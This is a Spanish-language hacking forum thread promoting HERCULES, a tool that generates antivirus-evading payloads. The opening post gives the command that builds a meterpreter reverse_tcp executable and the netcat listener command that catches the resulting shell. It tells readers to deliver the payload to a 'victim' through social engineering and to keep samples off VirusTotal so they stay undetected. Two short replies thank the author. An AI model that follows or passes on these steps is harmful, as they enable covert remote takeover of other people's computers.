comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

HERCULES: Genera un payload y evade los antivirus

  • 2 Respuestas
  • 2429 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado afravaz

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación -1
  • Tú blog sobre Seguridad Informática en español.
    • Ver Perfil
    • El Candado Informático
« en: Septiembre 09, 2016, 12:15:34 pm »

Definición:

Hercules es una herramienta cuyo proposito es generar un payload fud (Fully Undetectable) que evade antivirus.

Antes de nada:

*POR FAVOR NO SUBAIS EL PAYLOAD A VIRUSTOTAL!, porque dejaría de ser FUD.

Tutorial:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
./HERCULES_x64 192.168.1.20 4444 –p windows/meterpreter/reverse_tcp –a x64 –l dynamic
“./HERCULES_x64 [IP LOCAL] [PUERTO] –p [PAYLOAD] –a [ARQUITECTURA] –l [LINKER]”

Se nos guardará un payload que tendrá el nombre de Payload.exe el cual enviaremos a nuestra victima mediante cualquier técnica de ingeniería social.
Crearemos un listener TCP con NetCat escribiendo el comando:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
nc –l –p [PUERTO]
+ Cabe destacar que también podremos poner un listenner de metasploit y ganar así una sesión meterpreter.
*NetCat: Es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).

Ratio de detección:


Descarga:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Vídeo:
« Última modificación: Septiembre 12, 2016, 10:51:17 am por afravaz »
elcandadoinformatico. Tú blog sobre Seguridad Informática en español.

Desconectado Pricker

  • *
  • Underc0der
  • Mensajes: 29
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« Respuesta #1 en: Septiembre 09, 2016, 03:42:27 pm »
Excelente aporte, lo probaré en mi lab.. y ver q pinta, gracias

Enviado desde mi XT1058 mediante Tapatalk


Desconectado ro0tmag

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
  • No sabía que era imposible
    • Ver Perfil
« Respuesta #2 en: Septiembre 09, 2016, 04:07:48 pm »
Muy bueno! No conocía este tipo de herramientas.

Gracias
No tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!



[Leer] Test para tu Firewall, Antivirus & Navegadores

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1540
Último mensaje Junio 24, 2011, 12:02:36 am
por LucaSthefano
Como eliminar Virus del Pc sin antivirus

Iniciado por k43l

Respuestas: 4
Vistas: 3782
Último mensaje Enero 20, 2013, 10:21:01 pm
por k43l
Veil – Evasión de Antivirus

Iniciado por Stuxnet

Respuestas: 1
Vistas: 1980
Último mensaje Diciembre 12, 2013, 09:45:48 am
por ANTRAX
Prueba tu antivirus con Wicar

Iniciado por rreedd

Respuestas: 1
Vistas: 792
Último mensaje Enero 31, 2018, 03:17:16 am
por user_en1gm4
Evadiendo Antivirus con Shellter

Iniciado por LionSec

Respuestas: 6
Vistas: 5822
Último mensaje Octubre 19, 2015, 01:29:06 pm
por zupa